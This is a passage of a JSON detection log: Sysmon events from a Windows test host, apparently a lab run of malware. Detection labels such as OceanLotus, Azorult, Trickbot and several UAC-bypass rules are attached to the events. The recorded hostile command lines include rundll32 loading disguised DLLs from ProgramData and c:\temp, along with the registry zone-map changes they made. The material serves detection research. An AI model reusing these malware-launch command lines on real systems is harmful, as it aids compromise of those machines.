21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424063,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.375545Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424064,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376024Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424065,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376053Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424066,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376077Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:57:36.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424067,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.376099Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51D0-5F93-0000-001036A15B00","ProcessId":3396,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:57:36.406"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424078,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:57:36.417723Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"EventData":{"CommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A","Image":"C:\\Windows\\System32\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":1216,"ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.171"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424081,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.176847Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\Rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ProcessId":7552,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:17.532"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424114,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.542300Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Call by Ordinal"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\SysWOW64\\rundll32.exe\" \"C:\\Windows\\SysWOW64\\shell32.dll\",#44 C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows host process (Rundll32)","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-4690-5F93-0000-002019A60800","LogonId":"0x8a619","OriginalFileName":"RUNDLL32.EXE","ParentCommandLine":"Rundll32.exe shell32.dll,Control_RunDLL C:\\PROGRA~3\\DATAUS~1.DLL 4624665222","ParentImage":"C:\\Windows\\System32\\rundll32.exe","ParentProcessGuid":"747F3D96-51F9-5F93-0000-001003125E00","ParentProcessId":7552,"ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-23 21:58:17.542"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":424115,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:17.543407Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:21.688"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424174,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.693498Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424244,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930237Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424245,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930339Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424246,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930392Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424247,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.930441Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424248,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931190Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424249,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931290Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000001)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424250,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931385Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000000)","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect","UtcTime":"2020-10-23 21:58:21.922"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424251,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:21.931451Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424260,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.063160Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51F9-5F93-0000-0010551E5E00","ProcessId":9116,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.063"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424262,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.074619Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FD-5F93-0000-00103B425E00","ProcessId":7504,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\bam\\State\\UserSettings\\S-1-5-21-3461203602-4096304019-2269080069-1000\\\\Device\\HarddiskVolume1\\Windows\\SysWOW64\\rundll32.exe","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":424320,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.361291Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\data.enc","UtcTime":"2020-10-23 21:58:22.360"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424322,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.364651Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-23 21:35:19.617","Image":"C:\\Windows\\SysWOW64\\rundll32.exe","ProcessGuid":"747F3D96-51FE-5F93-0000-0010DC535E00","ProcessId":8920,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\config.xml","UtcTime":"2020-10-23 21:58:22.375"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":424323,"Execution_attributes":{"ProcessID":3208,"ThreadID":4804},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-23T21:58:22.391794Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Trickbot Malware Activity"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\wermgr.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Problem Reporting","FileVersion":"10.0.17763.1369 (WinBuild.160101.0800)","Hashes":"SHA1=231052FA4311FA3501539E34E21A624921E3C270,MD5=CD042F94B63D67E012CFB4297D313248,SHA256=61A84B2D8CA05C11E79DB8E18FEB0FE4BE1B8D555D0BE2651516B144800153AB,IMPHASH=4E00FCA0721761B10A8A7351CEFB0596","Image":"C:\\Windows\\System32\\wermgr.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6311-5F8F-0000-0020E0100900","LogonId":"0x910e0","OriginalFileName":"WerMgr","ParentCommandLine":"rundll32.exe c:\\temp\\winfire.dll,DllRegisterServer","ParentImage":"C:\\Windows\\SysWOW64\\rundll32.exe","ParentProcessGuid":"747F3D96-659B-5F8F-0000-001026C33300","ParentProcessId":2372,"ProcessGuid":"747F3D96-659E-5F8F-0000-001064E03300","ProcessId":5600,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-20 22:33:02.059"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":422695,"Execution_attributes":{"ProcessID":3408,"ThreadID":4448},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-20T22:33:02.063979Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network 